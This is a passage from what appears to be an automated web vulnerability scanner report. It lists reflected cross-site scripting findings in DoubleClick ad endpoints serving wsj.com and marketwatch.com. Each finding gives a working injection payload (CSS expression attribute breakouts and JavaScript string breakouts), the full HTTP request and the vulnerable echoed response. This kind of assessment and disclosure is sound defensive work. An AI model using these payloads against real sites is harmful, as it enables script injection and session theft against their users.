Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 551

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;215945709;0-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;biz=1053;;s=8_10001;mc=b2pfreezone;tile=2;sz=230x70;e62da"style="x:expression(alert(1))"2236a8fae01;~aopt=6/1/ff/1;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d672d"style%3d"x%3aexpression(alert(1))"37335724abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d672d"style="x:expression(alert(1))"37335724abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=%5E%5ElA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;ord=1066106610661066;&d672d"style%3d"x%3aexpression(alert(1))"37335724abd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:39:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 459

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;44306;0-0;0;31680223;31596-2/94;0/0/0;u=^^lA;~okv=;u=^^lA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;&d672d"style="x:expression(alert(1))"37335724abd=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718d4"style%3d"x%3aexpression(alert(1))"8d3f641a6d3 was submitted in the u parameter. This input was echoed as 718d4"style="x:expression(alert(1))"8d3f641a6d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=%5E%5ElA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;ord=1066106610661066;718d4"style%3d"x%3aexpression(alert(1))"8d3f641a6d3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 456

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;44306;0-0;0;31680223;31596-2/94;0/0/0;u=^^lA;~okv=;u=^^lA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;718d4"style="x:expression(alert(1))"8d3f641a6d3;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/pf_weekendinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfd2"style%3d"x%3aexpression(alert(1))"5a8be0492cb was submitted in the !category parameter. This input was echoed as 2cfd2"style="x:expression(alert(1))"5a8be0492cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/pf_weekendinvestor;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;ord=6291629162916291;2cfd2"style%3d"x%3aexpression(alert(1))"5a8be0492cb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:37:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 572

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/y;218880928;0-0;1;49299998;28945-571/208;36054130/36072016/1;;~okv=;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;2cfd2"style="x:expression(alert(1))"5a8be0492cb;~aopt=2/1/ff/1;~sscs=%3fhttp://commerce.wsj.com/auth/login?roles=FREEREG-BASE&amp;reg-track-code=ss3_0310">
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/pf_weekendinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6da8"style%3d"x%3aexpression(alert(1))"491de8a7ea7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6da8"style="x:expression(alert(1))"491de8a7ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/pf_weekendinvestor;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;ord=6291629162916291;&d6da8"style%3d"x%3aexpression(alert(1))"491de8a7ea7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 575

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/y;218880928;0-0;1;49299998;28945-571/208;36054130/36072016/1;;~okv=;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;&d6da8"style="x:expression(alert(1))"491de8a7ea7=1;~aopt=2/1/ff/1;~sscs=%3fhttp://commerce.wsj.com/auth/login?roles=FREEREG-BASE&amp;reg-track-code=ss3_0310">
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tilebot

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9678b"style%3d"x%3aexpression(alert(1))"93b4aee328e was submitted in the !category parameter. This input was echoed as 9678b"style="x:expression(alert(1))"93b4aee328e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tilebot;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;ord=5003500350035003;9678b"style%3d"x%3aexpression(alert(1))"93b4aee328e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:40:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 525

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;237012713;0-0;1;60333544;2-120/90;40909831/40927618/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;9678b"style="x:expression(alert(1))"93b4aee328e;~aopt=2/1/ff/1;~sscs=%3fhttp://www.Brownharrisstevens.com">
...[SNIP]...

4.19. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tilebot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b79d6"style%3d"x%3aexpression(alert(1))"80c502dadb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b79d6"style="x:expression(alert(1))"80c502dadb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tilebot;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;ord=5003500350035003;&b79d6"style%3d"x%3aexpression(alert(1))"80c502dadb5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:41:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 528

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;237012713;0-0;1;60333544;2-120/90;40909831/40927618/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;&b79d6"style="x:expression(alert(1))"80c502dadb5=1;~aopt=2/1/ff/1;~sscs=%3fhttp://www.Brownharrisstevens.com">
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tiletop

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d3e6"style%3d"x%3aexpression(alert(1))"c9e8184e84a was submitted in the !category parameter. This input was echoed as 3d3e6"style="x:expression(alert(1))"c9e8184e84a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tiletop;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;ord=5003500350035003;3d3e6"style%3d"x%3aexpression(alert(1))"c9e8184e84a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:40:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 536

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;237007724;0-0;1;60333542;2-120/90;40888842/40906629/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;3d3e6"style="x:expression(alert(1))"c9e8184e84a;~aopt=2/1/ff/1;~sscs=%3fhttp://www.theremaxcollection.com">
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tiletop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 927aa"style%3d"x%3aexpression(alert(1))"8dafbc3225b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 927aa"style="x:expression(alert(1))"8dafbc3225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tiletop;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;ord=5003500350035003;&927aa"style%3d"x%3aexpression(alert(1))"8dafbc3225b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 539

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;237007724;0-0;1;60333542;2-120/90;40888842/40906629/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;&927aa"style="x:expression(alert(1))"8dafbc3225b=1;~aopt=2/1/ff/1;~sscs=%3fhttp://www.theremaxcollection.com">
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/brand_channel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbaa5"style%3d"x%3aexpression(alert(1))"be227d3384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbaa5"style="x:expression(alert(1))"be227d3384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/brand_channel;u=%5e%5e;sz=377x140;tile=8;ord=1820011674?&dbaa5"style%3d"x%3aexpression(alert(1))"be227d3384=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:17:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;216938922;0-0;0;39274004;29332-377/140;42148535/42166322/1;u=^^;~okv=;u=^^;sz=377x140;tile=8;;dbaa5"style="x:expression(alert(1))"be227d3384=1;~aopt=6/1/ff/1;~sscs=%3fhttp://www.marketwatch.com/investing-insights?reflink=djm_hamwinvestinginsightsevent1">
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/brand_channel

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 879f8'-alert(1)-'937c450e926 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/marketwatch.com/brand_channel;u=879f8'-alert(1)-'937c450e926 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 52362
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:16:48 GMT
Expires: Sat, 14 May 2011 10:16:48 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=39274004;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=3294807;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=879f8'-alert(1)-'937c450e926&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/marketwatch.com/frontpage [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/frontpage

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c2f"style%3d"x%3aexpression(alert(1))"028110bafbf was submitted in the u parameter. This input was echoed as b2c2f"style="x:expression(alert(1))"028110bafbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/frontpage;u=b2c2f"style%3d"x%3aexpression(alert(1))"028110bafbf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 632
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:16:19 GMT
Expires: Sat, 14 May 2011 10:16:19 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112443;255-0/0;36796821/36814699/1;u=b2c2f"style="x:expression(alert(1))"028110bafbf;~okv=;u=b2c2f"style="x:expression(alert(1))"028110bafbf;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.25. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the mc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decdc"style%3d"x%3aexpression(alert(1))"1f315fea566 was submitted in the mc parameter. This input was echoed as decdc"style="x:expression(alert(1))"1f315fea566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=decdc"style%3d"x%3aexpression(alert(1))"1f315fea566 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 584
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:34 GMT
Expires: Sat, 14 May 2011 10:31:34 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;225017382;0-0;0;13314513;255-0/0;36796821/36814699/1;;~okv=;mc=decdc"style="x:expression(alert(1))"1f315fea566;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.26. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the mc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76f1'-alert(1)-'733e9c42067 was submitted in the mc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=e76f1'-alert(1)-'733e9c42067 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 52206
